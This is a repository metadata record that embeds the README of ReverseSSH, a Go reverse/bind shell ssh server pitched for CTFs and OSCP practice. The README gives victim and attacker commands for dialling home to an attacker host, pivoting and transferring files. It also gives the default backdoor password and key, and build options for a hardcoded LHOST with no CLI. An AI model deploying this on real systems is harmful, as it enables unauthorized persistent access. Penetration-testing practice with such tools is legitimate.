{"id":13505356,"url":"https://github.com/Fahrj/reverse-ssh","last_synced_at":"2025-03-29T23:31:29.081Z","repository":{"id":37818302,"uuid":"385345059","full_name":"Fahrj/reverse-ssh","owner":"Fahrj","description":"Statically-linked ssh server with reverse shell functionality for CTFs and such","archived":false,"fork":false,"pushed_at":"2023-02-15T00:16:25.000Z","size":4197,"stargazers_count":926,"open_issues_count":9,"forks_count":132,"subscribers_count":13,"default_branch":"master","last_synced_at":"2024-11-01T02:35:21.366Z","etag":null,"topics":["backdoor","conpty","golang","hacking","penetration-testing","penetration-testing-tools","remote-admin-tool","remote-shell","reverse-shell","security","security-tools","ssh","terminal"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Fahrj.png","metadata":{"files":{"readme":"Readme.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-07-12T18:26:29.000Z","updated_at":"2024-10-23T15:43:40.000Z","dependencies_parsed_at":"2024-06-18T20:00:38.007Z","dependency_job_id":"46ffbbc4-876d-4b6f-84e6-dfbfb52084a9","html_url":"https://github.com/Fahrj/reverse-ssh","commit_stats":{"total_commits":60,"total_committers":3,"mean_commits":20.0,"dds":0.08333333333333337,"last_synced_commit":"b5b9a0d482367bcf4505b01115a9abf1c652c6c6"},"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Fahrj%2Freverse-ssh","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Fahrj%2Freverse
-ssh/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Fahrj%2Freverse-ssh/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Fahrj%2Freverse-ssh/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Fahrj","download_url":"https://codeload.github.com/Fahrj/reverse-ssh/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246258884,"owners_count":20748573,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","conpty","golang","hacking","penetration-testing","penetration-testing-tools","remote-admin-tool","remote-shell","reverse-shell","security","security-tools","ssh","terminal"],"created_at":"2024-08-01T00:01:03.275Z","updated_at":"2025-03-29T23:31:24.072Z","avatar_url":"https://github.com/Fahrj.png","language":"Go","readme":"# ReverseSSH\n\n**A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. 
Most useful during HackTheBox challenges, CTFs or similar.**\n\nIt was developed and extensively used during OSCP exam preparation.\n\n**[Get the latest Release](https://github.com/Fahrj/reverse-ssh/releases/latest)**\n\n![Showcase](assets/showcase.gif)\n\n\n## Features\n\nCatching a reverse shell with _netcat_ is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory?\nBesides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.\n\nInstead, you can simply deploy the **lightweight ssh server** (\u003c1.5MB) `reverse-ssh` onto the target, and use additional conveniences such as **file transfer** and **port forwarding**!\n\nReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation.\nIts main strengths are the following:\n\n* **Fully interactive shell access** (check caveats for old Windows versions below)\n* **File transfer via sftp**\n* **Local / remote / dynamic port forwarding**\n* **Can be used as bind- and reverse-shell**\n* Supports **Unix** and **Windows** operating systems\n\n**Windows caveats**\n\nA fully interactive PowerShell on Windows relies on [Windows Pseudo Console ConPTY](https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/) and thus requires at least `Win10 Build 17763`.\nOn earlier versions you can still get an interactive reverse shell, but it can't handle virtual terminal codes such as arrow keys or keyboard interrupts.\nIn such cases you have to append the `cmd` command, i.e. 
`ssh \u003cOPTIONS\u003e \u003cIP\u003e cmd`.\n\nYou can achieve full interactive shell access for older Windows versions by dropping `ssh-shellhost.exe` [from OpenSSH for Windows](https://github.com/PowerShell/Win32-OpenSSH/releases/latest) in the same directory as `reverse-ssh` and then using the flag `-s ssh-shellhost.exe`.\nThis will pipe all traffic through `ssh-shellhost.exe`, which mimics a pty and transforms all virtual terminal codes into a form that Windows can understand.\n\n\n## Requirements\n\nExecuting the provided binaries relies only on the [golang system requirements](https://github.com/golang/go/wiki/MinimumRequirements#operating-systems).\n\nIn short:\n\n* **Linux**: kernel version 2.6.23 and higher\n* **Windows**: Windows Server 2008R2 and higher or Windows 7 and higher\n\nCompiling additionally requires the following:\n\n* golang version 1.15\n* optionally `upx` for compression (e.g. `apt install upx-ucl`)\n\n\n## Usage\n\nOnce `reverse-ssh` is running on the victim, you can connect with any username and the default password `letmeinbrudipls`, the ssh key or whatever you specified during compilation.\nAfter all, it is just an ssh server:\n\n```\n# Fully interactive shell access\n$ ssh -p \u003cRPORT\u003e \u003cRHOST\u003e\n\n# Simple command execution\n$ ssh -p \u003cRPORT\u003e \u003cRHOST\u003e whoami\n\n# Full-fledged file transfers\n$ sftp -P \u003cRPORT\u003e \u003cRHOST\u003e\n\n# Dynamic port forwarding as SOCKS proxy on port 9050\n$ ssh -p \u003cRPORT\u003e -D 9050 \u003cRHOST\u003e\n```\n\n### Running ReverseSSH as bind shell\n\n```\n# Victim\nvictim$ ./reverse-ssh\n\n# Attacker (default password: letmeinbrudipls)\nattacker$ ssh -p 31337 \u003cRHOST\u003e\n```\n\n### Running ReverseSSH as reverse shell\n\nNote: you can compile ReverseSSH with parameters for LHOST and LPORT to ease execution on the target, [see below](#build-tricks)\n\n```\n# On attacker (get ready to catch the incoming request;\n# can be omitted if you already have an ssh 
daemon running, e.g. OpenSSH)\n# NOTE: LPORT of 8888 collides with incoming connections; use the flag `-b 8889` or similar on the victim in that case\nattacker$ ./reverse-ssh -v -l -p \u003cLPORT\u003e\n\n# On victim\nvictim$ ./reverse-ssh -p \u003cLPORT\u003e \u003cLHOST\u003e\n# or in case of an ssh daemon listening at port 22 with password authentication for user 'kali'\nvictim$ ./reverse-ssh -p 22 kali@\u003cLHOST\u003e\n\n# On attacker (default password: letmeinbrudipls)\nattacker$ ssh -p 8888 127.0.0.1\n# or with ssh config from below\nattacker$ ssh target\n```\n\nIn the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22.\nJust prepend `\u003cUSER\u003e@` and provide the password once asked to do so.\nDialling home currently is password only, because I didn't feel like baking a private key in there as well yet...\n\nFor even more convenience, add the following to your `~/.ssh/config`, copy the [ssh private key](assets/id_reverse-ssh) to `~/.ssh/` and simply call `ssh target` or `sftp target` afterwards:\n\n```\nHost target\n        Hostname 127.0.0.1\n        Port 8888\n        IdentityFile ~/.ssh/id_reverse-ssh\n        IdentitiesOnly yes\n        StrictHostKeyChecking no\n        UserKnownHostsFile /dev/null\n```\n\n### Full usage\n\n```\nreverseSSH v1.2.0  Copyright (C) 2021  Ferdinor \u003cferdinor@mailbox.org\u003e\n\nUsage: reverse-ssh [options] [[\u003cuser\u003e@]\u003ctarget\u003e]\n\nExamples:\n  Bind:\n        reverse-ssh -l\n        reverse-ssh -v -l -p 4444\n  Reverse:\n        reverse-ssh 192.168.0.1\n        reverse-ssh kali@192.168.0.1\n        reverse-ssh -p 31337 192.168.0.1\n        reverse-ssh -v -b 0 kali@192.168.0.2\n\nOptions:\n        -l, Start reverseSSH in listening mode (overrides reverse scenario)\n        -p, Port at which reverseSSH is listening for incoming ssh connections (bind scenario)\n                or where it tries to 
establish a ssh connection (reverse scenario) (default: 31337)\n        -b, Reverse scenario only: bind to this port after dialling home (default: 8888)\n        -s, Shell to spawn for incoming connections, e.g. /bin/bash; (default: /bin/bash)\n                for windows this can only be used to give a path to 'ssh-shellhost.exe' to\n                enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)\n        -N, Deny all incoming shell/exec/subsystem and local port forwarding requests\n                (if only remote port forwarding is needed, e.g. when catching reverse connections)\n        -v, Emit log output\n\n\u003ctarget\u003e\n        Optional target which enables the reverse scenario. Can be prepended with\n        \u003cuser\u003e@ to authenticate as a different user other than 'reverse' while dialling home\n\nCredentials:\n        Accepting all incoming connections from any user with either of the following:\n         * Password \"letmeinbrudipls\"\n         * PubKey   \"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi\"\n```\n\n\n## Build instructions\n\nMake sure to install the above requirements such as golang in a matching version and set it up correctly.\nAfterwards, you can compile with `make`, which will create static binaries in `bin`.\nUse `make compressed` to pack the binaries with upx to further reduce their size.\n\n```\n$ make\n\n# or to additionally create binaries packed with upx\n$ make compressed\n```\n\n### Build tricks\n\nYou can also specify one or more of the following environment variables when compiling to customize ReverseSSH to your use case:\n\n* `RS_SHELL` to change the default shell\n* `RS_PASS` to provide your personalized password\n* `RS_PUB` to provide your personalized authorized key\n* `LUSER` to change the default username of the ssh connection attempt\n* `LHOST` to provide a default LHOST value and make **ReverseSSH default to the reverse 
scenario**\n* `LPORT` to change the default listening port or port where an ssh connection attempt is sent to\n* `BPORT` to change the default listening port of reverse connections on the attacker machine; **0 means any free port is taken**\n* `NOCLI` with any value removes all user-facing interaction (the binary ignores all supplied flags or arguments)\n\n```shell\n$ ssh-keygen -t ed25519 -f id_reverse-ssh\n\n$ RS_SHELL=\"/bin/sh\" RS_PASS=\"secret\" RS_PUB=\"$(cat id_reverse-ssh.pub)\" make compressed\n\n$ LHOST=\"192.168.0.10\" LPORT=\"443\" BPORT=\"0\" RS_PUB=\"$(cat id_reverse-ssh.pub)\" make compressed\n```\n\n### Building for different operating systems or architectures\n\nBy default, `reverse-ssh` is compiled for your current OS and architecture, as well as for linux and windows in x86 and x64.\nTo compile for other architectures or another OS you can provide environmental variables which match your target, e.g. for linux/arm64:\n\n```\n$ GOARCH=arm64 GOOS=linux make compressed\n```\n\nA list of available targets in format `OS/arch` can be obtained via `go tool dist list`.\n\n\n## Contribute\n\nIs a mind-blowing feature missing? Anything not working as intended?\n\n**Create an issue or pull request!**\n","funding_links":[],"categories":["Standard SSH servers","Go","Hacking 💀"],"sub_categories":["Apps (Terminal)"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FFahrj%2Freverse-ssh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FFahrj%2Freverse-ssh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FFahrj%2Freverse-ssh/lists"}